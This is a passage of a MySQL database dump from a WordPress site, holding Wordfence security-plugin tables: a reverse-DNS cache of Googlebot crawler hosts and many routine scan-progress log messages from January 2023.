UNLOCK TABLES;

--
-- Table structure for table `wp_wfreversecache`
--

DROP TABLE IF EXISTS `wp_wfreversecache`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wfreversecache` (
  `IP` binary(16) NOT NULL DEFAULT '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',
  `host` varchar(255) NOT NULL,
  `lastUpdate` int(10) unsigned NOT NULL,
  PRIMARY KEY (`IP`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wfreversecache`
--

LOCK TABLES `wp_wfreversecache` WRITE;
/*!40000 ALTER TABLE `wp_wfreversecache` DISABLE KEYS */;
INSERT INTO `wp_wfreversecache` VALUES ('\0\0\0\0\0\0\0\0\0\0��B�B','crawl-66-249-66-15.googlebot.com',1675096662),('\0\0\0\0\0\0\0\0\0\0��B�BA','crawl-66-249-66-65.googlebot.com',1675083673),('\0\0\0\0\0\0\0\0\0\0��B�B�','crawl-66-249-66-204.googlebot.com',1675111573),('\0\0\0\0\0\0\0\0\0\0��B�K�','crawl-66-249-75-229.googlebot.com',1675197481),('\0\0\0\0\0\0\0\0\0\0��B�K�','crawl-66-249-75-250.googlebot.com',1675209031),('\0\0\0\0\0\0\0\0\0\0��B�K�','crawl-66-249-75-252.googlebot.com',1675181268);
/*!40000 ALTER TABLE `wp_wfreversecache` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wfsnipcache`
--

DROP TABLE IF EXISTS `wp_wfsnipcache`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wfsnipcache` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `IP` varchar(45) NOT NULL DEFAULT '',
  `expiration` timestamp NOT NULL DEFAULT current_timestamp(),
  `body` varchar(255) NOT NULL DEFAULT '',
  `count` int(10) unsigned NOT NULL DEFAULT 0,
  `type` int(10) unsigned NOT NULL DEFAULT 0,
  PRIMARY KEY (`id`),
  KEY `expiration` (`expiration`),
  KEY `IP` (`IP`),
  KEY `type` (`type`)
) ENGINE=InnoDB AUTO_INCREMENT=2319 DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wfsnipcache`
--

LOCK TABLES `wp_wfsnipcache` WRITE;
/*!40000 ALTER TABLE `wp_wfsnipcache` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_wfsnipcache` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wfstatus`
--

DROP TABLE IF EXISTS `wp_wfstatus`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wfstatus` (
  `id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `ctime` double(17,6) unsigned NOT NULL,
  `level` tinyint(3) unsigned NOT NULL,
  `type` char(5) NOT NULL,
  `msg` varchar(1000) NOT NULL,
  PRIMARY KEY (`id`),
  KEY `k1` (`ctime`),
  KEY `k2` (`type`)
) ENGINE=InnoDB AUTO_INCREMENT=23794 DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wfstatus`
--

LOCK TABLES `wp_wfstatus` WRITE;
/*!40000 ALTER TABLE `wp_wfstatus` DISABLE KEYS */;
INSERT INTO `wp_wfstatus` VALUES (22649,1674011735.773237,2,'info','Analyzed 3400 files containing 51.09 MB of data so far'),(22650,1674011742.209610,2,'info','Analyzed 3500 files containing 54.9 MB of data so far'),(22651,1674011745.678720,2,'info','Analyzed 3600 files containing 57.97 MB of data so far'),(22652,1674011749.744785,2,'info','Analyzed 3700 files containing 60.05 MB of data so far'),(22653,1674011753.640701,2,'info','Analyzed 3800 files containing 61.39 MB of data so far'),(22654,1674011757.803267,2,'info','Analyzed 3900 files containing 61.69 MB of data so far'),(22655,1674011760.857338,2,'info','Analyzed 4000 files containing 62.87 MB of data so far'),(22656,1674011763.783304,2,'info','Analyzed 4100 files containing 68.56 MB of data so far'),(22657,1674011767.842191,2,'info','Analyzed 4200 files containing 69.28 MB of data so far'),(22658,1674011773.145879,2,'info','Analyzed 4300 files containing 69.63 MB of data so far'),(22659,1674011778.581324,2,'info','Analyzed 4400 files containing 69.86 MB of data so far'),(22660,1674011782.768495,2,'info','Analyzed 4500 files containing 70.12 MB of data so far'),(22661,1674011786.999958,2,'info','Analyzed 4600 files containing 70.42 MB of data so far'),(22662,1674011792.228689,2,'info','Analyzed 4700 files containing 70.58 MB of data so far'),(22663,1674011796.267511,2,'info','Analyzed 4800 files containing 70.83 MB of data so far'),(22664,1674011800.760194,2,'info','Analyzed 4900 files containing 71.81 MB of data so far'),(22665,1674011805.775907,2,'info','Analyzed 5000 files containing 74.12 MB of data so far'),(22666,1674011810.499103,2,'info','Analyzed 5100 files containing 76.6 MB of data so far'),(22667,1674011815.442941,2,'info','Analyzed 5200 files containing 78.39 MB of data so far'),(22668,1674011819.609746,2,'info','Analyzed 5300 files containing 80.13 MB of data so far'),(22669,1674011824.630424,2,'info','Analyzed 5400 files containing 93.73 MB of data so far'),(22670,1674011828.912837,2,'info','Analyzed 5500 files containing 97.13 MB of data so far'),(22671,1674011833.519880,2,'info','Analyzed 5600 files containing 99.35 MB of data so far'),(22672,1674011843.777821,2,'info','Analyzed 5700 files containing 102.24 MB of data so far'),(22673,1674011849.452463,2,'info','Analyzed 5800 files containing 105.18 MB of data so far'),(22674,1674011854.807047,2,'info','Analyzed 5900 files containing 106.43 MB of data so far'),(22675,1674011859.890536,2,'info','Analyzed 6000 files containing 108.08 MB of data so far'),(22676,1674011865.830094,2,'info','Analyzed 6100 files containing 110.15 MB of data so far'),(22677,1674011875.226249,2,'info','Analyzed 6200 files containing 112.43 MB of data so far'),(22678,1674011886.342153,2,'info','Analyzed 6300 files containing 113.57 MB of data so far'),(22679,1674011896.402029,2,'info','Analyzed 6400 files containing 124.34 MB of data so far'),(22680,1674011903.505669,2,'info','Analyzed 6500 files containing 128.86 MB of data so far'),(22681,1674011912.192534,2,'info','Analyzed 6600 files containing 130.59 MB of data so far'),(22682,1674011919.268344,2,'info','Analyzed 6700 files containing 132.26 MB of data so far'),(22683,1674011926.456873,2,'info','Analyzed 6800 files containing 136.74 MB of data so far'),(22684,1674011932.952406,2,'info','Analyzed 6900 files containing 137.91 MB of data so far'),(22685,1674011939.949622,2,'info','Analyzed 7000 files containing 139.69 MB of data so far'),(22686,1674011940.111361,2,'info','Analyzed 7003 files containing 139.73 MB of data.'),(22694,1674011945.138732,2,'info','Starting scan of file contents'),(22695,1674011946.328579,2,'info','Scanned contents of 16 additional files at 13.79 per second'),(22696,1674011947.362449,2,'info','Scanned contents of 36 additional files at 16.41 per second'),(22697,1674011948.435144,2,'info','Scanned contents of 46 additional files at 14.08 per second'),(22698,1674011950.174051,2,'info','Scanned contents of 53 additional files at 10.59 per second'),(22699,1674011951.271918,2,'info','Scanned contents of 68 additional files at 11.14 per second'),(22700,1674011952.284800,2,'info','Scanned contents of 85 additional files at 11.94 per second'),(22701,1674011953.298011,2,'info','Scanned contents of 108 additional files at 13.28 per second'),(22702,1674011954.332736,2,'info','Scanned contents of 127 additional files at 13.86 per second'),(22703,1674011955.337402,2,'info','Scanned contents of 144 additional files at 14.16 per second'),(22704,1674011956.379501,2,'info','Scanned contents of 163 additional files at 14.54 per second'),(22705,1674011957.481415,2,'info','Scanned contents of 186 additional files at 15.11 per second'),(22706,1674011958.588318,2,'info','Scanned contents of 211 additional files at 15.72 per second'),(22707,1674011959.618413,2,'info','Scanned contents of 228 additional files at 15.78 per second'),(22708,1674011960.659134,2,'info','Scanned contents of 244 additional files at 15.75 per second'),(22709,1674011961.671987,2,'info','Scanned contents of 263 additional files at 15.94 per second'),(22710,1674011962.696409,2,'info','Scanned contents of 281 additional files at 16.03 per second'),(22711,1674011963.702729,2,'info','Scanned contents of 304 additional files at 16.40 per second'),(22712,1674011964.718068,2,'info','Scanned contents of 321 additional files at 16.42 per second'),(22713,1674011965.729795,2,'info','Scanned contents of 335 additional files at 16.29 per second'),(22714,1674011967.211223,2,'info','Scanned contents of 338 additional files at 15.33 per second'),(22715,1674011968.222671,2,'info','Scanned contents of 348 additional files at 15.09 per second'),(22716,1674011969.257694,2,'info','Scanned contents of 358 additional files at 14.86 per second'),(22717,1674011970.285533,2,'info','Scanned contents of 381 additional files at 15.17 per second'),(22718,1674011971.310589,2,'info','Scanned contents of 397 additional files at 15.19 per second'),(22719,1674011972.321568,2,'info','Scanned contents of 412 additional files at 15.17 per second'),(22720,1674011973.323960,2,'info','Scanned contents of 431 additional files at 15.31 per second'),(22721,1674011974.358410,2,'info','Scanned contents of 448 additional files at 15.35 per second'),(22722,1674011975.366360,2,'info','Scanned contents of 464 additional files at 15.37 per second'),(22723,1674011976.406261,2,'info','Scanned contents of 478 additional files at 15.30 per second'),(22724,1674011977.439834,2,'info','Scanned contents of 498 additional files at 15.43 per second'),(22725,1674011978.459333,2,'info','Scanned contents of 514 additional files at 15.44 per second'),(22726,1674011979.476441,2,'info','Scanned contents of 545 additional files at 15.89 per second'),(22727,1674011980.498837,2,'info','Scanned contents of 576 additional files at 16.30 per second'),(22728,1674011981.514413,2,'info','Scanned contents of 599 additional files at 16.48 per second'),(22729,1674011983.040431,2,'info','Scanned contents of 603 additional files at 15.92 per second'),(22730,1674011984.068921,2,'info','Scanned contents of 621 additional files at 15.96 per second'),(22731,1674011985.078069,2,'info','Scanned contents of 640 additional files at 16.04 per second'),(22732,1674011986.119244,2,'info','Scanned contents of 658 additional files at 16.07 per second'),(22733,1674011987.136755,2,'info','Scanned contents of 667 additional files at 15.89 per second'),(22734,1674011988.145999,2,'info','Scanned contents of 679 additional files at 15.80 per second'),(22735,1674011989.176915,2,'info','Scanned contents of 703 additional files at 15.97 per second'),(22736,1674011990.186789,2,'info','Scanned contents of 722 additional files at 16.04 per second'),(22737,1674011991.225192,2,'info','Scanned contents of 737 additional files at 16.00 per second'),(22738,1674011992.314276,2,'info','Scanned contents of 751 additional files at 15.93 per second'),(22739,1674011993.340572,2,'info','Scanned contents of 767 additional files at 15.92 per second'),(22740,1674011994.370184,2,'info','Scanned contents of 785 additional files at 15.95 per second'),(22741,1674011995.378682,2,'info','Scanned contents of 801 additional files at 15.95 per second'),(22742,1674011996.401424,2,'info','Scanned contents of 819 additional files at 15.99 per second'),(22743,1674011997.491282,2,'info','Scanned contents of 836 additional files at 15.98 per second'),(22744,1674011998.925733,2,'info','Scanned contents of 844 additional files at 15.70 per second'),(22745,1674011999.994961,2,'info','Scanned contents of 860 additional files at 15.69 per second'),(22746,1674012001.009855,2,'info','Scanned contents of 878 additional files at 15.72 per second'),(22747,1674012002.084912,2,'info','Scanned contents of 894 additional files at 15.71 per second'),(22748,1674012003.097034,2,'info','Scanned contents of 910 additional files at 15.71 per second'),(22749,1674012003.460697,2,'info','Scanned contents of 916 additional files at 15.71 per second'),(22750,1674012003.471185,2,'info','Asking Wordfence to check URLs against malware list.'),(22751,1674012003.486480,2,'info','Checking 2101 host keys against Wordfence scanning servers.'),(22752,1674012004.146837,2,'info','Done host key check.'),(22753,1674012004.355236,2,'info','Done file contents scan'),(22759,1674012005.360342,2,'info','Examining URLs found in posts we scanned for dangerous websites'),(22760,1674012005.370961,2,'info','Checking 323 host keys against Wordfence scanning servers.'),(22761,1674012005.985016,2,'info','Done host key check.'),(22762,1674012005.988370,2,'info','Done examining URLs'),(22767,1674012006.457296,2,'info','Starting password strength check on 1 user.'),(22774,1674012010.293617,2,'info','Examining URLs found in the options we scanned for dangerous websites'),(22775,1674012010.309963,2,'info','Done examining URLs'),(22777,1674012010.588491,1,'info','-------------------'),(22778,1674012010.609283,2,'info','Wordfence used 24.17 MB of memory for scan. Server peak memory usage was: 56.17 MB'),(22779,1674012010.630516,1,'info','Scan Complete. Scanned 7003 files, 10 plugins, 2 themes, 45 posts, 0 comments and 2937 URLs in 7 minutes 45 seconds.'),(22782,1674037117.680884,1,'info','Initiating quick scan'),(22787,1674037117.905452,1,'info','-------------------'),(22788,1674037117.929015,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 32 MB'),(22789,1674037117.940773,1,'info','Quick Scan Complete. Scanned in less than 1 second.'),(22792,1674123651.945976,1,'info','Initiating quick scan'),(22797,1674123652.536386,1,'info','-------------------'),(22798,1674123652.555622,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 34 MB'),(22799,1674123652.560734,1,'info','Quick Scan Complete. Scanned in 1 second.'),(22802,1674209713.416116,1,'info','Initiating quick scan'),(22807,1674209713.702702,1,'info','-------------------'),(22808,1674209713.709860,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 32 MB'),(22809,1674209713.711966,1,'info','Quick Scan Complete. Scanned in less than 1 second.'),(22811,1674270699.961304,1,'info','Scheduled Wordfence scan starting at Saturday 21st of January 2023 03:11:39 AM'),(22813,1674270703.378585,1,'info','Contacting Wordfence to initiate scan'),(22820,1674270713.715874,2,'info','Total disk space: 3.58 TB -- Free disk space: 3.27 TB'),(22821,1674270713.737598,2,'info','The disk has 3432686.71 MB available'),(22829,1674270714.685665,2,'info','Getting plugin list from WordPress'),(22830,1674270714.823411,2,'info','Found 9 plugins'),(22831,1674270714.886968,2,'info','Getting theme list from WordPress'),(22832,1674270715.473450,2,'info','Found 2 themes'),(22844,1674270718.317193,2,'info','500 files indexed'),(22845,1674270718.588419,2,'info','1000 files indexed'),(22846,1674270718.967257,2,'info','1500 files indexed'),(22847,1674270719.178059,2,'info','2000 files indexed'),(22848,1674270719.388419,2,'info','2500 files indexed'),(22849,1674270719.621119,2,'info','3000 files indexed'),(22850,1674270719.801630,2,'info','3500 files indexed'),(22851,1674270719.988615,2,'info','4000 files indexed'),(22852,1674270720.009246,2,'info','4046 files indexed'),(22853,1674270722.631978,2,'info','4546 files indexed'),(22854,1674270722.837497,2,'info','5046 files indexed'),(22855,1674270723.024236,2,'info','5546 files indexed'),(22856,1674270723.244370,2,'info','6046 files indexed'),(22857,1674270723.575853,2,'info','6546 files indexed'),(22858,1674270723.613204,2,'info','7003 files indexed'),(22859,1674270728.089340,2,'info','Analyzed 100 files containing 1.7 MB of data so far'),(22860,1674270734.806324,2,'info','Analyzed 200 files containing 2.9 MB of data so far'),(22861,1674270742.684942,2,'info','Analyzed 300 files containing 4.11 MB of data so far'),(22862,1674270747.137089,2,'info','Analyzed 400 files containing 6.95 MB of data so far'),(22863,1674270755.449529,2,'info','Analyzed 500 files containing 7.86 MB of data so far'),(22864,1674270765.764237,2,'info','Analyzed 600 files containing 8.88 MB of data so far'),(22865,1674270772.270291,2,'info','Analyzed 700 files containing 12.73 MB of data so far'),(22866,1674270779.048013,2,'info','Analyzed 800 files containing 15.15 MB of data so far'),(22867,1674270783.862767,2,'info','Analyzed 900 files containing 18.65 MB of data so far'),(22868,1674270789.269314,2,'info','Analyzed 1000 files containing 20.11 MB of data so far'),(22869,1674270795.723514,2,'info','Analyzed 1100 files containing 21.9 MB of data so far'),(22870,1674270800.447890,2,'info','Analyzed 1200 files containing 28.93 MB of data so far'),(22871,1674270805.028241,2,'info','Analyzed 1300 files containing 31.22 MB of data so far'),(22872,1674270813.431546,2,'info','Analyzed 1400 files containing 32.22 MB of data so far'),(22873,1674270823.514862,2,'info','Analyzed 1500 files containing 33.5 MB of data so far'),(22874,1674270829.885813,2,'info','Analyzed 1600 files containing 33.93 MB of data so far'),(22875,1674270834.699104,2,'info','Analyzed 1700 files containing 34.52 MB of data so far'),(22876,1674270842.204155,2,'info','Analyzed 1800 files containing 34.82 MB of data so far'),(22877,1674270848.384205,2,'info','Analyzed 1900 files containing 35.42 MB of data so far'),(22878,1674270854.237018,2,'info','Analyzed 2000 files containing 38.17 MB of data so far'),(22879,1674270863.122429,2,'info','Analyzed 2100 files containing 41.04 MB of data so far'),(22880,1674270867.780648,2,'info','Analyzed 2200 files containing 41.91 MB of data so far'),(22881,1674270873.380251,2,'info','Analyzed 2300 files containing 42.08 MB of data so far'),(22882,1674270878.623377,2,'info','Analyzed 2400 files containing 42.71 MB of data so far'),(22883,1674270882.763273,2,'info','Analyzed 2500 files containing 43.06 MB of data so far'),(22884,1674270887.219788,2,'info','Analyzed 2600 files containing 43.3 MB of data so far'),(22885,1674270891.532548,2,'info','Analyzed 2700 files containing 43.84 MB of data so far'),(22886,1674270897.101098,2,'info','Analyzed 2800 files containing 44.28 MB of data so far'),(22887,1674270901.556405,2,'info','Analyzed 2900 files containing 45.04 MB of data so far'),(22888,1674270905.758657,2,'info','Analyzed 3000 files containing 45.07 MB of data so far'),(22889,1674270912.587951,2,'info','Analyzed 3100 files containing 45.1 MB of data so far'),(22890,1674270920.028055,2,'info','Analyzed 3200 files containing 47.72 MB of data so far'),(22891,1674270925.191811,2,'info','Analyzed 3300 files containing 50.22 MB of data so far'),(22892,1674270929.783982,2,'info','Analyzed 3400 files containing 51.09 MB of data so far'),(22893,1674270933.212161,2,'info','Analyzed 3500 files containing 54.9 MB of data so far'),(22894,1674270938.803096,2,'info','Analyzed 3600 files containing 57.97 MB of data so far'),(22895,1674270945.686838,2,'info','Analyzed 3700 files containing 60.05 MB of data so far'),(22896,1674270949.851302,2,'info','Analyzed 3800 files containing 61.39 MB of data so far'),(22897,1674270953.386086,2,'info','Analyzed 3900 files containing 61.69 MB of data so far'),(22898,1674270958.168993,2,'info','Analyzed 4000 files containing 62.87 MB of data so far'),(22899,1674270962.950407,2,'info','Analyzed 4100 files containing 68.57 MB of data so far'),(22900,1674270966.861672,2,'info','Analyzed 4200 files containing 69.28 MB of data so far'),(22901,1674270971.701393,2,'info','Analyzed 4300 files containing 69.64 MB of data so far'),(22902,1674270977.808321,2,'info','Analyzed 4400 files containing 69.87 MB of data so far'),(22903,1674270982.276193,2,'info','Analyzed 4500 files containing 70.13 MB of data so far'),(22904,1674270986.521896,2,'info','Analyzed 4600 files containing 70.43 MB of data so far'),(22905,1674270995.617707,2,'info','Analyzed 4700 files containing 70.59 MB of data so far'),(22906,1674271001.123474,2,'info','Analyzed 4800 files containing 70.84 MB of data so far'),(22907,1674271006.551716,2,'info','Analyzed 4900 files containing 71.81 MB of data so far'),(22908,1674271012.667092,2,'info','Analyzed 5000 files containing 74.13 MB of data so far'),(22909,1674271017.476118,2,'info','Analyzed 5100 files containing 76.61 MB of data so far'),(22910,1674271022.787856,2,'info','Analyzed 5200 files containing 78.39 MB of data so far'),(22911,1674271035.773734,2,'info','Analyzed 5300 files containing 80.14 MB of data so far'),(22912,1674271041.069134,2,'info','Analyzed 5400 files containing 93.74 MB of data so far'),(22913,1674271046.175182,2,'info','Analyzed 5500 files containing 97.14 MB of data so far'),(22914,1674271049.973360,2,'info','Analyzed 5600 files containing 99.36 MB of data so far'),(22915,1674271056.465090,2,'info','Analyzed 5700 files containing 102.25 MB of data so far'),(22916,1674271061.176881,2,'info','Analyzed 5800 files containing 105.19 MB of data so far'),(22917,1674271065.019240,2,'info','Analyzed 5900 files containing 106.44 MB of data so far'),(22918,1674271070.392109,2,'info','Analyzed 6000 files containing 108.08 MB of data so far'),(22919,1674271077.307089,2,'info','Analyzed 6100 files containing 110.16 MB of data so far'),(22920,1674271082.442116,2,'info','Analyzed 6200 files containing 112.44 MB of data so far'),(22921,1674271088.759949,2,'info','Analyzed 6300 files containing 113.57 MB of data so far'),(22922,1674271094.868909,2,'info','Analyzed 6400 files containing 124.35 MB of data so far'),(22923,1674271103.097713,2,'info','Analyzed 6500 files containing 128.87 MB of data so far'),(22924,1674271108.950761,2,'info','Analyzed 6600 files containing 130.6 MB of data so far'),(22925,1674271117.784295,2,'info','Analyzed 6700 files containing 132.27 MB of data so far'),(22926,1674271124.237457,2,'info','Analyzed 6800 files containing 136.75 MB of data so far'),(22927,1674271129.897399,2,'info','Analyzed 6900 files containing 137.92 MB of data so far'),(22928,1674271137.349389,2,'info','Analyzed 7000 files containing 139.7 MB of data so far'),(22929,1674271137.560455,2,'info','Analyzed 7003 files containing 139.74 MB of data.'),(22937,1674271139.475869,2,'info','Starting scan of file contents'),(22938,1674271140.573806,2,'info','Scanned contents of 21 additional files at 19.69 per second'),(22939,1674271141.593465,2,'info','Scanned contents of 48 additional files at 23.01 per second'),(22940,1674271142.659279,2,'info','Scanned contents of 67 additional files at 21.26 per second'),(22941,1674271143.749086,2,'info','Scanned contents of 87 additional files at 20.51 per second'),(22942,1674271144.801521,2,'info','Scanned contents of 109 additional files at 20.59 per second'),(22943,1674271145.807015,2,'info','Scanned contents of 127 additional files at 20.16 per second'),(22944,1674271146.809777,2,'info','Scanned contents of 150 additional files at 20.54 per second'),(22945,1674271147.866183,2,'info','Scanned contents of 164 additional files at 19.62 per second'),(22946,1674271149.205939,2,'info','Scanned contents of 166 additional files at 17.12 per second'),(22947,1674271150.272766,2,'info','Scanned contents of 181 additional files at 16.81 per second'),(22948,1674271151.330733,2,'info','Scanned contents of 195 additional files at 16.49 per second'),(22949,1674271152.370267,2,'info','Scanned contents of 211 additional files at 16.40 per second'),(22950,1674271153.403675,2,'info','Scanned contents of 230 additional files at 16.55 per second'),(22951,1674271154.426096,2,'info','Scanned contents of 255 additional files at 17.09 per second'),(22952,1674271155.472833,2,'info','Scanned contents of 279 additional files at 17.48 per second'),(22953,1674271156.545114,2,'info','Scanned contents of 305 additional files at 17.90 per second'),(22954,1674271157.622182,2,'info','Scanned contents of 325 additional files at 17.94 per second'),(22955,1674271158.641541,2,'info','Scanned contents of 347 additional files at 18.14 per second'),(22956,1674271159.655477,2,'info','Scanned contents of 360 additional files at 17.87 per second'),(22957,1674271160.718955,2,'info','Scanned contents of 380 additional files at 17.91 per second'),(22958,1674271161.794541,2,'info','Scanned contents of 400 additional files at 17.95 per second'),(22959,1674271162.803502,2,'info','Scanned contents of 419 additional files at 17.99 per second'),(22960,1674271163.869378,2,'info','Scanned contents of 433 additional files at 17.77 per second'),(22961,1674271164.983589,2,'info','Scanned contents of 452 additional files at 17.74 per second'),(22962,1674271166.010374,2,'info','Scanned contents of 453 additional files at 17.09 per second'),(22963,1674271167.037514,2,'info','Scanned contents of 468 additional files at 17.00 per second'),(22964,1674271168.072024,2,'info','Scanned contents of 482 additional files at 16.87 per second'),(22965,1674271169.086563,2,'info','Scanned contents of 500 additional files at 16.90 per second'),(22966,1674271170.112158,2,'info','Scanned contents of 517 additional files at 16.89 per second'),(22967,1674271171.161778,2,'info','Scanned contents of 535 additional files at 16.90 per second'),(22968,1674271172.230512,2,'info','Scanned contents of 550 additional files at 16.81 per second'),(22969,1674271173.271935,2,'info','Scanned contents of 566 additional files at 16.76 per second'),(22970,1674271174.278655,2,'info','Scanned contents of 583 additional files at 16.77 per second'),(22971,1674271175.324407,2,'info','Scanned contents of 596 additional files at 16.64 per second'),(22972,1674271176.331182,2,'info','Scanned contents of 607 additional files at 16.48 per second'),(22973,1674271177.351116,2,'info','Scanned contents of 622 additional files at 16.44 per second'),(22974,1674271178.430677,2,'info','Scanned contents of 642 additional files at 16.49 per second'),(22975,1674271179.479645,2,'info','Scanned contents of 661 additional files at 16.54 per second'),(22976,1674271180.512131,2,'info','Scanned contents of 674 additional files at 16.44 per second'),(22977,1674271182.204375,2,'info','Scanned contents of 684 additional files at 16.02 per second'),(22978,1674271183.217919,2,'info','Scanned contents of 698 additional files at 15.97 per second'),(22979,1674271184.298488,2,'info','Scanned contents of 712 additional files at 15.90 per second'),(22980,1674271185.337989,2,'info','Scanned contents of 724 additional files at 15.80 per second'),(22981,1674271186.450779,2,'info','Scanned contents of 735 additional files at 15.66 per second'),(22982,1674271187.865622,2,'info','Scanned contents of 740 additional files at 15.30 per second'),(22983,1674271188.946847,2,'info','Scanned contents of 747 additional files at 15.11 per second'),(22984,1674271189.993280,2,'info','Scanned contents of 759 additional files at 15.03 per second'),(22985,1674271191.047151,2,'info','Scanned contents of 776 additional files at 15.06 per second'),(22986,1674271192.088560,2,'info','Scanned contents of 795 additional files at 15.12 per second'),(22987,1674271193.098243,2,'info','Scanned contents of 807 additional files at 15.06 per second'),(22988,1674271194.148283,2,'info','Scanned contents of 831 additional files at 15.21 per second'),(22989,1674271195.181427,2,'info','Scanned contents of 849 additional files at 15.25 per second'),(22990,1674271196.213603,2,'info','Scanned contents of 868 additional files at 15.31 per second'),(22991,1674271197.354996,2,'info','Scanned contents of 891 additional files at 15.40 per second'),(22992,1674271198.944897,2,'info','Scanned contents of 904 additional files at 15.21 per second'),(22993,1674271199.602672,2,'info','Scanned contents of 916 additional files at 15.24 per second'),(22994,1674271199.604867,2,'info','Asking Wordfence to check URLs against malware list.'),(22995,1674271199.617425,2,'info','Checking 2101 host keys against Wordfence scanning servers.'),(22996,1674271200.227809,2,'info','Done host key check.'),(22997,1674271200.470604,2,'info','Done file contents scan'),(23003,1674271201.500055,2,'info','Examining URLs found in posts we scanned for dangerous websites'),(23004,1674271201.502321,2,'info','Checking 323 host keys against Wordfence scanning servers.'),(23005,1674271202.101105,2,'info','Done host key check.'),(23006,1674271202.104553,2,'info','Done examining URLs'),(23011,1674271202.961801,2,'info','Starting password strength check on 1 user.'),(23018,1674271206.828882,2,'info','Examining URLs found in the options we scanned for dangerous websites'),(23019,1674271206.839481,2,'info','Done examining URLs'),(23021,1674271207.175547,1,'info','-------------------'),(23022,1674271207.185675,2,'info','Wordfence used 22.17 MB of memory for scan. Server peak memory usage was: 54.17 MB'),(23023,1674271207.210592,1,'info','Scan Complete. Scanned 7003 files, 10 plugins, 2 themes, 45 posts, 0 comments and 2937 URLs in 8 minutes 23 seconds.'),(23026,1674296444.711100,1,'info','Initiating quick scan'),(23031,1674296444.946503,1,'info','-------------------'),(23032,1674296444.967553,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 32 MB'),(23033,1674296444.978220,1,'info','Quick Scan Complete. Scanned in less than 1 second.'),(23036,1674383400.551288,1,'info','Initiating quick scan'),(23041,1674383400.793953,1,'info','-------------------'),(23042,1674383400.800518,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 32 MB'),(23043,1674383400.805934,1,'info','Quick Scan Complete. Scanned in less than 1 second.'),(23046,1674468817.655069,1,'info','Initiating quick scan'),(23051,1674468817.981234,1,'info','-------------------'),(23052,1674468818.000089,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 32 MB'),(23053,1674468818.011086,1,'info','Quick Scan Complete. Scanned in 1 second.'),(23055,1674529840.136745,1,'info','Scheduled Wordfence scan starting at Tuesday 24th of January 2023 03:10:40 AM'),(23057,1674529846.303759,1,'info','Contacting Wordfence to initiate scan'),(23064,1674529855.816052,2,'info','Total disk space: 3.58 TB -- Free disk space: 3.27 TB'),(23065,1674529855.824852,2,'info','The disk has 3431887.21 MB available'),(23073,1674529856.306430,2,'info','Getting plugin list from WordPress'),(23074,1674529856.351060,2,'info','Found 9 plugins'),(23075,1674529856.383225,2,'info','Getting theme list from WordPress'),(23076,1674529856.581808,2,'info','Found 2 themes'),(23088,1674529859.222701,2,'info','500 files indexed'),(23089,1674529859.355557,2,'info','1000 files indexed'),(23090,1674529859.463275,2,'info','1500 files indexed'),(23091,1674529859.598880,2,'info','2000 files indexed'),(23092,1674529859.801408,2,'info','2500 files indexed'),(23093,1674529860.010998,2,'info','3000 files indexed'),(23094,1674529860.220191,2,'info','3500 files indexed'),(23095,1674529860.376266,2,'info','4000 files indexed'),(23096,1674529860.550998,2,'info','4500 files indexed'),(23097,1674529860.723541,2,'info','5000 files indexed'),(23098,1674529860.870761,2,'info','5500 files indexed'),(23099,1674529861.111079,2,'info','6000 files indexed'),(23100,1674529861.428599,2,'info','6500 files indexed'),(23101,1674529861.474119,2,'info','7000 files indexed'),(23102,1674529861.501934,2,'info','7003 files indexed'),(23103,1674529868.233567,2,'info','Analyzed 100 files containing 1.7 MB of data so far'),(23104,1674529882.485585,2,'info','Analyzed 200 files containing 2.9 MB of data so far'),(23105,1674529889.778881,2,'info','Analyzed 300 files containing 4.11 MB of data so far'),(23106,1674529898.647653,2,'info','Analyzed 400 files containing 6.95 MB of data so far'),(23107,1674529905.911460,2,'info','Analyzed 500 files containing 7.86 MB of data so far'),(23108,1674529913.950127,2,'info','Analyzed 600 files containing 8.88 MB of data so far'),(23109,1674529919.217538,2,'info','Analyzed 700 files containing 12.73 MB of data so far'),(23110,1674529924.283409,2,'info','Analyzed 800 files containing 15.15 MB of data so far'),(23111,1674529929.813807,2,'info','Analyzed 900 files containing 18.65 MB of data so far'),(23112,1674529933.977814,2,'info','Analyzed 1000 files containing 20.11 MB of data so far'),(23113,1674529938.439294,2,'info','Analyzed 1100 files containing 21.9 MB of data so far'),(23114,1674529945.076490,2,'info','Analyzed 1200 files containing 28.93 MB of data so far'),(23115,1674529950.062229,2,'info','Analyzed 1300 files containing 31.22 MB of data so far'),(23116,1674529956.702151,2,'info','Analyzed 1400 files containing 32.22 MB of data so far'),(23117,1674529962.405399,2,'info','Analyzed 1500 files containing 33.5 MB of data so far'),(23118,1674529967.818424,2,'info','Analyzed 1600 files containing 33.93 MB of data so far'),(23119,1674529971.964682,2,'info','Analyzed 1700 files containing 34.52 MB of data so far'),(23120,1674529977.841391,2,'info','Analyzed 1800 files containing 34.82 MB of data so far'),(23121,1674529983.762777,2,'info','Analyzed 1900 files containing 35.42 MB of data so far'),(23122,1674529990.484925,2,'info','Analyzed 2000 files containing 38.17 MB of data so far'),(23123,1674529995.722028,2,'info','Analyzed 2100 files containing 41.04 MB of data so 